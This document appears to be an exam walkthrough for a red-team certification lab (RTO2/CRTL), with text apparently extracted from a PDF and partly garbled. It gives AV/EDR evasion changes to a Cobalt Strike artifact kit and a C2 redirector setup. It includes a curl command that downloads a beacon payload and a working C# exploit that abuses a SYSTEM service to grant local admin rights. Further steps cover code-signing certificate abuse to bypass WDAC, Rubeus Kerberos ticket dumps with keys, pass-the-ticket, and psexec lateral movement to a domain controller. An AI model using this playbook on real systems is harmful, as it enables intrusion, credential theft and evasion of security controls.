Generate syscalls for the artifcat kit just follow the course material and generate all
needed file and copy them to artifact kit folder.
Now last thing we need to modify is bypass-pipe.c and we need to change the pipe
name like so:
//sprintf(pipename, "%c%c%c%c%c%c%c%c%cnerokek\\%d", 92, 92, 46, 92, 112,
105, 112, 101, 92, (int)(GetTickCount() % 9898));
sprintf(pipename, "\\%c.%c%c%c%c%c%clegit-%d-pipeu", 0x5c, 0x5c, 112,
105, 112, 101, 0x5c, (int)(GetTickCount() % 9898));
Once that's done you can compile your artifact-kit using the build.sh script but
remember to comment out the x86 build and add '-masm=intel' to x64 build in order
to comp le properly with the syscalls.asm file. Everything is in the RTO2 course
material.
Here is how successful compilation looks like:
Now you need to download your artifact-kit to your attacker machine.
Ok but that's not everything because you still need to recompile your sleepmask kit
and mimikatz kit. In terms of sleepmask kit you need just do compile it with the
build.sh script and the same applies to mimikatz kit. No other changes required. Once
you do that just download those onto your attacker machine.
Now your beacons should be good for bypassing the AV/EDR on the exam
InlineExecute-Assembly
https://github.com/mihaid10/InlineExecute-Assembly
I know that CRTL exam comes with limited tools but this one BOF will save your life
and will let you stress-less on your exam.
Infrastructure Preparation
You need
to f ollow
the RT02 course material to
setup your redirectors and ssh tunnels for your beacon.
Sinee its really straight
forward I will only provide you with the .htaccess file for C2 and the default-ssl.con
file for apache2.
Here is how the .htaccess looks like:
#RewriteCond %{HTTP_USER_AGENT} "Windows NT 10.0" [NC]
#RewriteRule .* https://localhost:8443/win-payload [P]
#RewriteRule ^test$ index.html [NC]
Here is the default-ssl.conf:
<IfModule mod_ssl.c>
<VirtualHost _default_:443>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
SSLEng ne on
SSLProxyEngine on
SSLProxyCheckPeerCN off
SSLCertificateFile
/etc/ssl/certs/public.crt
SSLCertificateKeyFile /etc/ssl/private/private.key
<FilesMatch "\.(cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>
</VirtualHost>
<Directory /var/www/html>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Require all granted
</Directory>
</IfModule>
(Please remember about generating the public.crt and private.key on teamserver
not on redirector and just copy them to your redirectors)
If you did everything correctly then you should be fine and you shouldn't have any
errors. Just remember when you are hosting a file for download you mus always
specify the following with curl:
curl -k -A "Legit Agent" https://<ip-redirector>/win-payload/beacon.exe O Welcome.exe
WKSTN1 - How to pwn
Generate your beacon and download it with curl to wkstn1. Once your beacon is
executed you should pay attention to the AV but your beacons will not be killed by it
at all. The first thing is enumerating the machine so please enumerate running
services on the machine.
You will notice a service such as this:
C:\Users\consultant>sc qc customsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: customsvc
TYPE
: 10
WIN32_OWN_PROCESS
START_TYPE
: 2
AUTO_START
ERROR_CONTROL
: 1
NORMAL
BINARY_PATH_NAME
: C:\Program Files\Custom
Service\CustomApp.exe
LOAD_ORDER_GROUP
:
TAG
: 0
DISPLAY_NAME
: customsvc
DEPENDENCIES
:
SERVICE_START_NAME : LocalSystem
This CustomApp.exe is our privilege escalation path. If you know a little bit of RE you
can copy this CustomApp to your consultant desktop and upload it to your attacker
machine where you can analyse the code using dnspy.
Here is the interesting code:
namespace CustomApp
{
// Token: 0x02000003 RID: 3
public class IpcHandler
{
// Token: 0x06000003 RID: 3 RVA: 0x00002124 File Offset:
0x00000324
public void Start()
{
this._listener = new
TcpListener(IPAddress.Loopback, 6666);
this._listener.Start(100);
this._running = true;
while (this._running)
{
TcpClient tcpClient =
this._listener.AcceptTcpClient();
IpcRequest ipcRequest =
tcpClient.ReadData().Deserialize<IpcRequest>();
if (ipcRequest == null ||
string.IsNullOrWhiteSpace(ipcRequest.Command))
{
tcpClient.Close();
return;
}
IpcHandler.ProcessIpcRequest(ipcRequest);
tcpClient.Close();
}
}
// Token: 0x06000004 RID: 4 RVA: 0x0000219F File Offset:
0x0000039F
public void Stop()
{
this._running = false;
this._listener.Stop();
}
// Token: 0x06000005 RID: 5 RVA: 0x000021B4 File Offset:
0x000003B4
private static void ProcessIpcRequest(IpcRequest request)
{
using (Process process = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = request.Command,
Arguments = request.Arguments,
WindowStyle =
ProcessWindowStyle.Hidden,
CreateNoWindow = true
}
})
{
process.Start();
}
}
// Token: 0x04000001 RID: 1
private TcpListener _listener;
// Token: 0x04000002 RID: 2
private bool _running;
}
}
It starts listener on port 6666 on loopback address. It waits for a json request with the
following format:
{ "args": "/c something", "cmd": "C:\\Windows\\System32\\cmd.exe" }
Here is my quick exploit for it which will add consultant to local admins group:
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Json;
using System.Text;
namespace CustomApp
{
[DataContract]
public class IpcRequest
{
[DataMember(Name = "cmd")]
public string Command { get; set; }
[DataMember(Name = "args")]
public string Arguments { get; set; }
}
class Program
{
static void Main(string[] args)
{
// Define the server address and port
string server = "127.0.0.1";
int port = 6666;
// Define the command and arguments to send
string command = "C:\\windows\\system32\\cmd.exe";
string argsString = "/c net localgroup administrators
consultant /add";
// Serialize the command and arguments to a JSON string
IpcRequest request = new IpcRequest
{
Command = command,
Arguments = argsString
};
MemoryStream stream = new MemoryStream();
DataContractJsonSerializer serializer = new
DataContractJsonSerializer(typeof(IpcRequest));
serializer.WriteObject(stream, request);
byte[] data = stream.ToArray();
string json = Encoding.UTF8.GetString(d ta);
Console.WriteLine("JSON data: " + json);
// Connect to the server and send the serialized data
try
{
using (TcpClient client = new TcpClient(server, port))
{
using (NetworkStream stream1 = client.GetStream())
{
stream1.Write(data, 0, data.Length);
Console.WriteLine("Data sent successfully");
byte[] buffer = new byte[1024];
int bytesRead = stream1.Read(buffer, 0,
buffer.Length);
string response = Encoding.UTF8.GetString(buffer,
0, bytesRead);
Console.WriteLine("Response received:
{response}");
}
}
}
catch (Exception ex)
{
Console.WriteLine("Failed to connect to {server} on port
{port}: {ex.Message}");
}
Console.ReadLine(); // Prevent console window from closing
}
}
}
You can compile the following code using the following command line:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\consultant\Desktop\Program.cs
Once compiled and execute you should see the following:
Please remember that the changes will not take effect until the machine is rebooted.
Otherwise you will have to enter your credentials to UAC prompt each time you try to
execute administrative task)
Flag1 is on smann desktop.
Once you get a beacon running in high integrity mode you can use getsystem
command to get SYSTEM token and then list running processes using ps. Once you
do that you will notice that user khawkins has two process running one of the
powershell which we can either steal_token or inject to in order to run as that user.
beacon> getsystem
[ ] Tasked beacon to get SYSTEM
beacon> ps
[*] Tasked beacon to list processes
[+] host called home, sent: 2755 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[*] Process List
PID
PPID
Name
Arch
Session
User
---
----
----
----
-------
-----
0
0
[System Process]
4
0
System
x64
0
NT
x64
0
NT
x64
0
NT
x64
0
NT
x64
2
x64
0
NT
x64
0
NT
x64
0
NT
x64
1
NT
x64
0
NT
x64
1
NT
x64
0
NT
x64
0
NT
AUTHORITY\SYSTEM
8
636
svchost.exe
AUTHORITY\SYSTEM
60
636
svchost.exe
AUTHORITY\SYSTEM
88
4
Registry
AUTHORITY\SYSTEM
96
768
RuntimeBroker.exe
RTO2\consultant
320
4
smss.exe
AUTHORITY\SYSTEM
344
636
svchost.exe
AUTHORITY\NETWORK SERVICE
420
408
csrss.exe
AUTHORITY\SYSTEM
496
488
csrss.exe
AUTHORITY\SYSTEM
544
408
wininit.exe
AUTHORITY\SYSTEM
560
488
winlogon.exe
AUTHORITY\SYSTEM
572
636
SgrmBroker.exe
AUTHORITY\SYSTEM
636
544
services.exe
AUTHORITY\SYSTEM
656
544
lsass.exe
x64
0
NT
x64
0
NT
fontdrvhost.exe
x64
0
Font Driver
fontdrvhost.exe
x64
1
Font Driver
svchost.exe
x64
0
NT
dwm.exe
x64
2
Window
svchost.exe
x64
0
NT
x64
1
NT
dwm.exe
x64
1
Window
svchost.exe
x64
0
NT
x64
0
NT
x64
0
NT
x64
0
NT
x64
0
NT
x64
0
NT
x64
2
x64
0
NT
x64
0
NT
x64
0
NT
x64
0
NT
x64
0
NT
AUTHORITY\SYSTEM
768
636
svchost.exe
AUTHORITY\SYSTEM
792
544
Host\UMFD-0
800
560
Host\UMFD-1
896
636
AUTHORITY\NETWORK SERVICE
908
2080
Manager\DWM-2
912
636
AUTHORITY\SYSTEM
972
560
LogonUI.exe
AUTHORITY\SYSTEM
992
560
Manager\DWM-1
1148
636
AUTHORITY\LOCAL SERVICE
1156
636
svchost.exe
AUTHORITY\LOCAL SERVICE
1164
636
svchost.exe
AUTHORITY\LOCAL SERVICE
1228
636
svchost.exe
AUTHORITY\NETWORK SERVICE
1436
636
svchost.exe
AUTHORITY\LOCAL SERVICE
1468
4
Memory Compression
AUTHORITY\SYSTEM
1520
344
rdpclip.exe
RTO2\consultant
1528
636
svchost.exe
AUTHORITY\LOCAL SERVICE
1536
636
svchost.exe
AUTHORITY\LOCAL SERVICE
1576
636
svchost.exe
AUTHORITY\LOCAL SERVICE
1608
636
svchost.exe
AUTHORITY\SYSTEM
1684
636
svchost.exe
AUTHORITY\LOCAL SERVICE
1696
636
svchost.exe
x64
0
NT
x64
0
NT
x64
0
NT
x64
2
x64
2
x64
2
NT
x64
0
NT
x64
0
NT
x64
0
NT
x64
2
x64
0
NT
x64
0
NT
x64
2
x64
0
x64
2
x64
0
NT
fontdrvhost.exe
x64
2
Font Driver
svchost.exe
x64
0
NT
x64
0
NT
x64
0
NT
x86
0
NT
x64
2
AUTHORITY\LOCAL SERVICE
1796
768
MoUsoCoreWorker.exe
AUTHORITY\SYSTEM
1852
636
spoolsv.exe
AUTHORITY\SYSTEM
1884
5636
msedge.exe
RTO2\consultant
1940
8
sihost.exe
RTO2\consultant
2080
2440
winlogon.exe
AUTHORITY\SYSTEM
2192
636
svchost.exe
AUTHORITY\SYSTEM
2308
636
CustomApp.exe
AUTHORITY\SYSTEM
2372
636
VGAuthService.exe
AUTHORITY\SYSTEM
2380
768
TextInputHost.exe
RTO2\consultant
2416
768
WmiPrvSE.exe
AUTHORITY\SYSTEM
2424
636
MsMpEng.exe
AUTHORITY\SYSTEM
2540
768
RuntimeBroker.exe
RTO2\consultant
2656
636
uhssvc.exe
NT
AUTHORITY\SYSTEM
2808
768
Microsoft.Photos.exe
RTO2\consultant
2872
3052
conhost.exe
AUTHORITY\SYSTEM
2948
2080
Host\UMFD-2
2980
636
AUTHORITY\SYSTEM
3016
636
svchost.exe
AUTHORITY\LOCAL SERVICE
3052
8
CompatTelRunner.exe
AUTHORITY\SYSTEM
3148
2652
MicrosoftEdgeUpdate.exe
AUTHORITY\SYSTEM
3200
5636
msedge.exe
RTO2\consultant
3228
4368
Welcome.exe
x64
2
x64
2
x64
2
x64
0
x64
2
x64
0
NT
x64
2
NT
x64
0
NT
x64
0
NT
x64
0
NT
x64
0
NT
x64
2
x64
2
x64
2
x64
2
RTO2\consultant
3320
8
taskhostw.exe
RTO2\consultant
3356
636
svchost.exe
RTO2\consultant
3504
636
WUDFHost.exe
NT
AUTHORITY\LOCAL SERVICE
3616
768
YourPhone.exe
RTO2\consultant
3664
636
NisSrv.exe
AUTHORITY\LOCAL SERVICE
3672
2440
csrss.exe
AUTHORITY\SYSTEM
3788
636
svchost.exe
AUTHORITY\SYSTEM
3896
636
SearchIndexer.exe
AUTHORITY\SYSTEM
3904
3052
CompatTelRunner.exe
AUTHORITY\SYSTEM
3932
636
svchost.exe
AUTHORITY\LOCAL SERVICE
4172
912
ctfmon.exe
RTO2\consultant
4320
768
RuntimeBroker.exe
RTO2\consultant
4368
4352
explorer.exe
RTO2\consultant
4396
768
dllhost.exe
RTO2\consultant
4400
8
powershell.exe
x64
0
4564
636
svchost.exe
x64
2
RTO2\khawkins
RTO2\consultant
4584
4400
conhost.exe
x64
0
RTO2\khawkins
4636
768
WmiPrvSE.exe
x64
0
NT
x64
2
x64
2
x64
2
AUTHORITY\NETWORK SERVICE
4912
768
StartMenuExperienceHost.exe
RTO2\consultant
4960
768
RuntimeBroker.exe
RTO2\consultant
4996
768
RuntimeBroker.exe
RTO2\consultant
5100
768
SearchApp.exe
x64
2
x64
2
x64
0
x64
2
x64
2
x64
2
x64
2
x64
2
x64
2
x64
2
x64
0
RTO2\consultant
5468
4368
SecurityHealthSystray.exe
RTO2\consultant
5496
636
SecurityHealthService.exe
NT
AUTHORITY\SYSTEM
5540
4368
vm3dservice.exe
RTO2\consultant
5636
4368
msedge.exe
RTO2\consultant
5780
5636
msedge.exe
RTO2\consultant
5912
8
taskhostw.exe
RTO2\consultant
5956
5636
msedge.exe
RTO2\consultant
5968
5636
msedge exe
RTO2\consultant
5992
5636
msedge.exe
RTO2\consultant
6096
636
svchost.exe
NT
AUTHORITY\SYSTEM
beacon> inject 4400 x64 smb
[*] Tasked beacon to inject windows/beacon_bind_pipe
(\\.\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell)
into 4400 (x64)
[+] host called home, sent: 260209 bytes
[+] established link to child beacon: 10.10.120.208
Now we need to use Certify to get a Code Signing Certificate in orde to bypass
WDAC on SRV host and other hosts in the domain.
You need to be khawkins because he is part of Developers group which can only
request this certificate. Here is how:
beacon> execute-assembly C:\Tools\Obftools\Certify\YouAreFuckingStupid\bin\Release\YouAreFuckingStupid.exe
request /ca:ca.redteamops2.local\sub-ca /template:RTO2CodeSigning
Copy the -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section
to a file cert.pem on teamserver.
Convert it to pfx file on teamserver using the following command:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic
Provider v1.0" -export -out cert.pfx
Very Important!
Download cert.pfx from teamserver to attacker machine and upload the signtool.exe,
cert.pfx and your beacon.exe to WKSTN1 through your beacon. Then use the signtool
to sign your beacon for use on SRV host. If you don't do as I said you will break your
certificate chain because attacker machine is not domain joined.
We can move laterly to SRV like this:
beacon> cd \\srv.redteamops2.local\c$\
beacon> upload C:\Payloads\beacon-signed.exe
beacon> remote-exec wmi SRV cmd.exe /c "C:\beacon-svc.exe"
beacon> link SRV <pipe>
Once we are on the SRV host we can grab the flag2 from Administrator desktop.
SRV
Once we are on srv we need to first get new beacon running as SYSTEM either
through getsystem or inject.
Once we are running as system you will need to execute Rubeus to view the tickets. I
recommend signing Rubeus with cert.pfx and uploading it to the target and then
executing it from disk. If AV is still a problem after you obfuscate your Rubeus you can
just disable it with powershell. Now lets run Rubeus:
beacon> run GloryAndVictoryToMerlin.exe triage
[*] Tasked beacon to run: GloryAndVictoryToMerlin.exe triage
[+] host called home, sent: 52 bytes
[+] received output:
______
\r
_
(_____ \
| |
_____) )_
_| |__
|
__
/| | | |
_____ _
_
___
_ \| ___ | | | |/___)
| |
\ \| |_| | |_) ) ____| |_| |___ |
|_|
|_|____/|____/|_____)____/(___/\r
v2.0.3 \r
\rAction: Triage Kerberos Tickets (All Users)\r
[*] Current LUID
: 0x3e7
--------------------------------------------------------------------------------------------------------------
| LUID
| UserName
| EndTime
| Service
|
-------------------------------------------------------------------------------------------------------------| 0xdad63 | smann @ REDTEAMOPS2.LOCAL
| krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:24:32 PM |
| 0xd0a98 | khawkins @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:36:07 PM |
| 0x946d8 | khawkins @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:36:07 PM |
| 0x3e4
| srv$ @ REDTEAMOPS2.LOCAL
| krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:24:14 PM |
| 0x3e4
| srv$ @ REDTEAMOPS2.LOCAL
|
ldap/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:14 PM |
| 0x3e4
| srv$ @ REDTEAMOPS2.LOCAL
| ldap/dc.redteamops2.local
| 2/26/2023 6:24:14 PM |
| 0x3e4
| srv$ @ REDTEAMOPS2.LOCAL
| cifs/dc.redteamops2.local
| 2/26/2023 6:24:14 PM |
| 0x3e7
| srv$ @ REDTEAMOPS2.LOCAL
| krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:45:00 PM |
| 0x3e7
| srv$ @ REDTEAMOPS2.LOCAL
| cifs/dc
| 2/26/2023 6:45:00 PM |
| 0x3e7
| srv$ @ REDTEAMOPS2.LOCAL
|
cifs/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:45:00 PM |
| 0x3e7
| srv$ @ REDTEAMOPS2.LOCAL
| ldap/dc.redteamops2.local
| 2/26/2023 6:45:00 PM |
| 0x3e7
| srv$ @ REDTEAMOPS2.LOCAL
| SRV$
| 2/26/2023 6:45:00 PM |
| 0x3e7
| srv$ @ REDTEAMOPS2.LOCAL
|
LDAP/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:45 00 PM |
--------------------------------------------------------------------------------------------------------------
Now we need to dump the ticket:
beacon> run GloryAndVictoryToMerlin.exe dump /luid:0xdad63 /nowrap
[*] Tasked beacon to run: GloryAndVictoryToMerlin.exe dump /luid:0xdad63
/nowrap
[+] host called home, sent: 72 bytes
[+] received output:
\r
______
_
(_____ \
| |
_____) )_
_| |__
_____ _
_
___
|
__
/| | | |
_ \| ___ | | | |/___)
| |
\ \| |_| | |_) ) ____| |_| |___ |
|_|
|_|____/|____/|_____)____/(___/\r
v2.0.3 \r
\rAction: Dump Kerberos Ticket Data (All Users)\r
[*] Target LUID
: 0xdad63
[*] Current LUID
: 0x3e7
UserName
: smann
Domain
: RTO2
LogonId
: 0xdad63
UserSID
: S-1-5-21-579679643-2453578207-2968119456-
1110
AuthenticationPackage
: Kerberos
LogonType
: Network
LogonTime
: 2/26/2023 9:49:42 AM
LogonServer
:
LogonServerDNSDomain
: REDTEAMOPS2.LOCAL
UserPrincipalName
:
ServiceName
:
krbtgt/REDTEAMOPS2.LOCAL
ServiceRealm
:
REDTEAMOPS2.LOCAL
UserName
:
smann
UserRealm
:
REDTEAMOPS2.LOCAL
StartTime
:
2/26/2023 8:25:02 AM
EndTime
:
2/26/2023 6:24:32 PM
RenewTill
:
3/5/2023 8:24:32 AM
Flags
:
name_canonicalize, pre_authent,
renewable, forwarded, forwardable
KeyType
:
Base64(key)
:
aes256_cts_hmac_sha1
zY37uKr0MZZfPwLWSAJJ33ExJNb2V1BTq2k8hvuEKlE=
Base64EncodedTicket
:
<base64ticket>
Now lets spawn a process for steal_token:
beacon> run GloryAndVictoryToMerlin.exe createnetonly
/program:C:\Windows\System32\cmd.exe /domain:RTO2 /username:smann
/password:FakePass /ticket:<base64ticket>
[+] host called home, sent: 2125 bytes
[+] received output:
\r
______
_
(_____ \
| |
_____) )_
_| |__
|
__
/| | | |
_____ _
_
___
_ \| ___ | | | |/___)
| |
\ \| |_| | |_) ) ____| |_| |___ |
|_|
|_|____/|____/|_____)____/(___/\r
v2.0.3 \r
\r[*] Action: Create Process (/netonly)\r
\r[*] Using RTO2\smann:FakePass\r
[*] Showing process : False
[*] Username
: smann
[*] Domain
: RTO2
[*] Password
: FakePass
[+] Process
: 'C:\Windows\System32\cmd.exe' successfully created
with LOGON_TYPE = 9
[+] ProcessID
: 3360
[+] Ticket successfully imported!
[+] LUID
: 0xe7ce1
beacon> steal_token 3360
[*] Tasked beacon to steal token from PID 3360
[+] host called home, sent: 12 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> ls \\wkstn2.redteamops2.local\c$
[*] Tasked beacon to list files in \\wkstn2.redteam ps2.local\c$
[+] host called home, sent: 47 bytes
[*] Listing: \\wkstn2.redteamops2.local\c$\
Size
Type
Last Modified
Name
----
----
-------------
----
dir
06/06/2022 11:38:01
$Recycle.Bin
dir
06/06/2022 13:29:25
$WinREAgent
dir
01/27/2022 18:18:49
Documents and Settings
dir
12/07/2019 09:14:52
PerfLogs
dir
06/16/2022 13:43:02
Program Files
dir
10/06/2021 13:57:25
Program Files (x86)
dir
09/21/2022 12:02:16
ProgramData
dir
06/08/2022 08:43:18
Recovery
dir
01/27/2022 18:19:18
System Volume Information
dir
09/21/2022 12:01:14
Users
dir
06/06/2022 14:37:15
Windows
8kb
fil
02/26/2023 08:23:43
DumpStack.log.tmp
796mb
fil
02/26/2023 08:23:43
hiberfil.sys
832mb
fil
02/26/2023 08:23:43
pagefile.sys
16mb
fil
02/26/2023 08:23:43
swapfile.sys
beacon> ls \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop
[*] Tasked beacon to list files in
\\wkstn2.redteamops2.local\c$\users\lmurray\Desktop
[+] host called home, sent: 69 bytes
[*] Listing: \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\
Size
Type
Last Modified
Name
----
-- -
-------------
----
282b
f l
06/06/2022 11:37:38
desktop.ini
70b
fil
02/23/2023 20:05:56
flag3.txt
beacon> download
\\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt
[*] Tasked beacon to download
\\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt
[+] host called home, sent: 69 bytes
[*] started download of
\\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt (70 bytes)
[*] download of flag3.txt is complete
To get a beacon you can just do the following:
cd \\wkstn2.redteamops2.local\c$\
upload c:\Payloads\beacon-signed.exe
beacon> remote-exec psexec WKSTN2 cmd.exe /c "C:\beacon-signed.exe"
[*] Tasked beacon to run 'cmd.exe /c "C:\beacon-svc.exe"' on WKSTN2 via
Service Control Manager
[+] host called home, sent: 2015 bytes
[+] received output:
Started service 4845abe on WKSTN2
beacon> link WKSTN2
PSHost.133206677787088104.5916.DefaultAppDomain.powershell
[*] Tasked to link to
\\WKSTN2\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell
[+] host called home, sent: 81 bytes
[+] established link to child beacon: 10.10.120.71
Now using Rubeus dump the tickets. This rubeus must be signed with cert.pfx
otherwise you will get an error:
beacon> inlineExecute-Assembly --dotnetassembly
C:\Tools\Loot\ObfRubeus.exe --assemblyargs triage --amsi --etw
[*] Running inlineExecute-Assembly by (@anthemtotheego)
[+] host called home, sent: 594728 bytes
[+] received output:
______
\r
_
(_____ \
| |
_____) )
_| |__
|
__
/| | | |
_____ _
_
___
_ \| ___ | | | |/___)
| |
\ \| |_| | |_) ) ____| |_| |___ |
|_|
|_|____/| ___/|_____)____/(___/\r
v2.0.3 \r
\rAction: Triage Kerberos Tickets (All Users)\r
[*] Current LUID
: 0x3e7
-------------------------------------------------------------------------------------------------------------| LUID
| EndTime
| UserName
| Service
|
----------------------------------------
-- ---------------------------
--------------------------------------| 0x1e5839 | smann @ REDTEAMOPS2.LOCAL
| cifs/WKSTN2
| 2/26/2023 6:24:32 PM |
| 0x1d868c | smann @ REDTEAMOPS2.LOCAL
| cifs/wkstn2.redteamops2.local
| 2/26/2023 6:24:32 PM |
| 0x3938f
| lmurray @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:24:32 PM |
| 0x3938f
| lmurray @ REDTEAMOPS2.LOCAL |
LDAP/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:32 PM |
| 0x3917f
| lmurray @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:24:32 PM |
| 0x3917f
| lmurray @ REDTEAMOPS2.LOCAL |
LDAP/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:32 PM |
| 0x3e4
| wkstn2$ @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:24:18 PM |
| 0x3e4
| wkstn2$ @ REDTEAMOPS2.LOCAL |
GC/dc.redteamops2.local/redteamops2.local
| 0x3e4
| 2/26/2023 6:24:18 PM |
| wkstn2$ @ REDTEAMOPS2.LOCAL | cifs/dc.redteamops2.local
| 2/26/2023 6:24:18 PM |
| 0x3e4
| wkstn2$ @ REDTEAMOPS2.LOCAL |
ldap/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:18 PM |
| 0x3e7
| wkstn2$ @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL
| 2/26/2023 6:24:18 PM |
| 0x3e7
| wkstn2$ @ REDTEAMOPS2.LOCAL |
cifs/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:18 PM |
| 0x3e7
| wkstn2$ @ REDTEAMOPS2.LOCAL | WKSTN2$
| 2/26/2023 6:24:18 PM |
| 0x3e7
| wkstn2$ @ REDTEAMOPS2.LOCAL | LDAP/dc.redteamops2.local
| 2/26/2023 6:24:18 PM |
| 0x3e7
| wkstn2$ @ REDTEAMOPS2.LOCAL |
LDAP/dc redteamops2.local/redteamops2.local | 2/26/2023 6:24:18 PM |
--------------------------------------------------------------------------------------------------------------
[+] received output:
[+] inlineExecute-Assembly Finished
beacon> inlineExecute-Assembly --dotnetassembly
C:\Tools\Loot\GloryAndVictoryToMerlin.exe --assemblyargs dump
/luid:0x3938f /nowrap --amsi --etw
[*] Running inlineExecute-Assembly by (@anthemtotheego)
[+] host called home, sent: 594748 bytes
[+] received output:
\r
______
_
(_____ \
| |
_____) )_
_| |__
|
__
/| | | |
_____ _
_
___
_ \| ___ | | | |/___)
| |
\ \| |_| | |_) ) ____| |_| |___ |
|_|
|_|____/|____/|_____)____/(___/\r
v2.0.3 \r
\rAction: Dump Kerberos Ticket Data (All Users)\r
[*] Target LUID
: 0x3938f
[*] Current LUID
: 0x3e7
UserName
: lmurray
Domain
: RTO2
LogonId
: 0x3938f
UserSID
: S-1-5-21-579679643-2453578207-2968119456-
1105
AuthenticationPackage
: Kerberos
LogonType
: Interactive
LogonTime
: 2/26/2023 8:24:31 AM
LogonServer
: DC
LogonServerDNSDomain
: REDTEAMOPS2.LOCAL
UserPrincipalName
: lmurray@redteamops2.local
ServiceName
:
krbtgt/REDTEAMOPS2.LOCAL
ServiceRealm
:
REDTEAMOPS2.LOCAL
UserName
:
lmurray
UserRealm
:
REDTEAMOPS2.LOCAL
StartTime
:
2/26/2023 8:24:32 AM
EndTime
:
2/26/2023 6:24:32 PM
RenewTill
:
3/5/2023 8:24:32 AM
Flags
:
name_canonicalize, pre_authent, initial,
KeyType
:
aes256_cts_hmac_sha1
Base64(key)
:
renewable, forwardable
TITM9RmcVagiksxO263OBTsmOZuneWL1cFGiEpYEb6Y=
Base64EncodedTicket
:
<base64ticket>
beacon> inlineExecute-Assembly --dotnetassembly
C:\Tools\Loot\GloryAndVictoryToMerlin.exe --assemblyargs createnetonly
/program:C:\Windows\System32\cmd.exe /domain:RTO2 /username:lmurray
/password:FakePass /ticket:<base64ticket>
[+] received output:
______
\r
_
(_____ \
| |
_____) )_
_| |__
|
__
/| | | |
_____ _
_
___
_ \| ___ | | | |/___)
| |
\ \| |_| | |_) ) ____| |_| |___ |
|_|
|_|____/|____/|_____)____/(___/\r
v2.0.3 \r
\r[*] Action: Create Process (/netonly)\r
\r[*] Using RTO2\lmurray:FakePass\r
[*] Showing process : False
[*] Username
: lmurray
[*] Domain
: RTO2
[*] Password
: FakePass
[+] Process
: 'C:\Windows\System32\cmd.exe' successfully created
with LOGON_TYPE = 9
[+] ProcessID
: 5080
[+] Ticket successfully imported!
[+] LUID
: 0x1f19d8
[+] received output:
[+] inlineExecute-Assembly Finished
beacon> steal_token 5080
beacon> ls \\dc.redteamops2.local\C$
[*] Tasked beacon to l st files in \\dc.redteamops2.local\C$
[+] host called home, sent: 43 bytes
[*] Listing: \\dc.redteamops2.local\C$\
Size
Type
Last Modified
Name
----
----
-------------
----
dir
06/06/2022 11:19:59
$Recycle.Bin
dir
05/11/2022 04:41:38
$WinREAgent
dir
05/25/2022 05:27:11
Boot
dir
08/19/2021 00:34:55
Documents and Settings
dir
08/19/2021 07:24:49
EFI
dir
05/08/2021 09:20:24
PerfLogs
dir
06/06/2022 15:49:50
Program Files
dir
05/11/2022 03:56:12
Program Files (x86)
dir
09/21/2022 12:59:59
ProgramData
dir
06/06/2022 10:59:03
Recovery
dir
06/06/2022 11:30:53
System Volume Information
dir
06/06/2022 11:00:20
Users
dir
06/06/2022 11:33:48
Windows
427kb
fil
05/25/2022 05:24:05
bootmgr
1b
fil
05/08/2021 09:14:33
BOOTNXT
12kb
fil
02/26/2023 08:22:53
DumpStack.log.tmp
384mb
fil
02/26/2023 08:22:53
pagefile.sys
beacon> ls \\dc.redteamops2.local\C$\Users\Administrator\Desktop
[*] Tasked beacon to list files in .
[+] host called home, sent: 34 bytes
[*] Listing: \\dc.redteamops2.local\C$\Users\Administrator\Desktop\
Size
Type
Last Modified
Name
----
----
-------------
----
282b
fil
06/06/2022 11:19:46
desktop.ini
70b
fil
02/23/2023 20:31:50
flag4.txt
beacon> upload C:\Payloads\beacon-signed.exe
[*] Tasked beacon to upload C:\Payloads\beacon-signed as beaconsigned.exe
[+] host called home, sent: 450938 bytes
beacon> remote-exec psexec DC cmd.exe /c "C:\beacon-signed.exe"
[*] Tasked beacon to run 'cmd.exe /c "C:\beacon-signed.exe"' on DC via
Service Control Manager
[+] host called home, sent: 2039 bytes
[+] received output:
Started service 35bf9d8 on DC
beacon> link DC
PSHost.133206677787088104.5916.DefaultAppDomain.powershell
[*] Tasked to link to
\\DC\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell
[+] host called home, sent: 77 bytes
[+] established link to child beacon: 10.10.120.227